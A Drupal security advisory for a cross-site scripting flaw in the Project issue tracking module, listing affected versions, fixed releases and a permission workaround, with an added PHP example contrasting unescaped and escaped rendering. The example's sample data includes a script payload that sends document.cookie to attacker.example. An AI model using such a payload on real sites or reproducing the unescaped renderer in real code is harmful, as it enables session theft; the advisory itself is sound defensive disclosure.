- Advisory ID: DRUPAL-SA-2008-012
- Project: Project issue tracking (third-party module)
- Version: 4.7.x-1.x, 4.7.x-2.x, 5.x-1.x, 5.x-2.x
- Date: 2008-January-30
- Security risk: Moderately critical
- Exploitable from: Remote
- Vulnerability: Cross-site scripting (XSS)
Description
The Project issue tracking module provides a summary table that shows how an issue's state changed between one comment and the next. Values displayed in that table are not adequately filtered before being placed in the page, so users who hold certain project editing rights (the permissions named in the workaround below) can inject arbitrary HTML and script into any page that displays these tables, where it executes in the browser of other visitors.
Wikipedia has more information about cross-site scripting (XSS).
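The following is an added illustration of the bug class described above, not code from the project_issue module: a state-change summary rendered once with the values concatenated straight into the markup and once with each value escaped. The advisory does not say which field carried the payload, so the 'Status' label below, the attacker URL and the sample records are constructed assumptions. Drupal 5/6 code would call check_plain() where the esc() helper is used here; esc() is a plain-PHP stand-in so the file runs without a Drupal bootstrap.

```php
<?php
// Added example (not project_issue's own code). Sample data is constructed.

// Constructed sample: a maintainer-controlled label carrying script.
// The affected field is an assumption; the payload shape is the point.
function sample_changes() {
  return array(
    array(
      'field' => 'Status',
      'old'   => 'active',
      'new'   => '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
    ),
    array('field' => 'Priority', 'old' => 'normal', 'new' => 'critical'),
  );
}

// Vulnerable form: user-supplied values go into the HTML unescaped.
function summary_table_vulnerable(array $changes) {
  $out = "<table><tr><th>Field</th><th>Old</th><th>New</th></tr>\n";
  foreach ($changes as $c) {
    $out .= "<tr><td>{$c['field']}</td><td>{$c['old']}</td><td>{$c['new']}</td></tr>\n";
  }
  return $out . "</table>\n";
}

// Stand-in for Drupal's check_plain(): encode every HTML metacharacter,
// including quotes, so a value can never break out of its text node.
function esc($s) {
  return htmlspecialchars((string) $s, ENT_QUOTES, 'UTF-8');
}

// Hardened form: identical layout, every value escaped at output time.
function summary_table_hardened(array $changes) {
  $out = "<table><tr><th>Field</th><th>Old</th><th>New</th></tr>\n";
  foreach ($changes as $c) {
    $out .= '<tr><td>' . esc($c['field']) . '</td><td>' . esc($c['old'])
          . '</td><td>' . esc($c['new']) . "</td></tr>\n";
  }
  return $out . "</table>\n";
}

// Simple check a reviewer can run: does a raw <script> tag survive rendering?
function contains_raw_script($html) {
  return stripos($html, '<script') !== false;
}

$changes = sample_changes();
$vuln = summary_table_vulnerable($changes);
$safe = summary_table_hardened($changes);

echo "vulnerable output contains raw <script>: " . (contains_raw_script($vuln) ? 'yes' : 'no') . "\n";
echo "hardened output contains raw <script>:   " . (contains_raw_script($safe) ? 'yes' : 'no') . "\n";
echo $safe;
```

Run with `php summary_table.php`; the vulnerable table reports a raw `<script>` element while the hardened table renders the payload as visible text (`&lt;script&gt;...`). The practical lesson for a module author is that escaping belongs at the point of output, not at the point of storage: a value that looks harmless when saved can still be dangerous once it is embedded in another page's markup.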
Versions affected
Project issue tracking (project_issue) versions:
- 5.x-2.x-dev from before 2008-01-30
- 5.x-1.2 and earlier
- 4.7.x-2.6 and earlier
- 4.7.x-1.6 and earlier
Drupal core is not affected. If you do not use the contributed Project issue tracking module, there is nothing you need to do.
Solution
Install the latest version:
- Project issue tracking 5.x-2.0
- Project issue tracking 5.x-1.3
- Project issue tracking 4.7.x-2.7
- Project issue tracking 4.7.x-1.7
As a temporary workaround until you can upgrade, remove the 'maintain projects' and 'administer projects' permissions from all roles, since users holding those permissions are the ones able to supply the affected values.
See also the Project issue tracking project page.
Reported by
Chad Phillips of the Drupal Security Team.
Contact
The security contact for Drupal can be reached at security at drupal.org or via the form at http://drupal.org/contact.